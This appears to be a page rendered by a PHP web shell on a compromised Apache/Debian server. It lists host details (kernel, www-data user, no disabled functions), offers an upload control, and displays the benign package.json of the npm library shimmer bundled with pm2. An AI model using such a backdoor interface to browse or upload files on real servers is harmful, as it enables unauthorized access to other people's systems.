HEX
Server: Apache/2.4.65 (Debian)
System: Linux kubikelcreative 5.10.0-35-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
User: www-data (33)
PHP: 8.4.13
Disabled: NONE
Upload Files
File: //usr/local/lib/node_modules/pm2/node_modules/shimmer/package.json
{
  "name": "shimmer",
  "version": "1.2.1",
  "description": "Safe(r) monkeypatching for JavaScript.",
  "main": "index.js",
  "scripts": {
    "test": "standard && tap test/*.tap.js --coverage"
  },
  "repository": {
    "type": "git",
    "url": "https://github.com/othiym23/shimmer.git"
  },
  "keywords": [
    "monkeypatch",
    "swizzle",
    "wrapping",
    "danger",
    "hmm",
    "shim"
  ],
  "author": "Forrest L Norvell <ogd@aoaioxxysz.net>",
  "license": "BSD-2-Clause",
  "devDependencies": {
    "sinon": "^7.2.2",
    "standard": "^12.0.1",
    "tap": "^12.1.1"
  }
}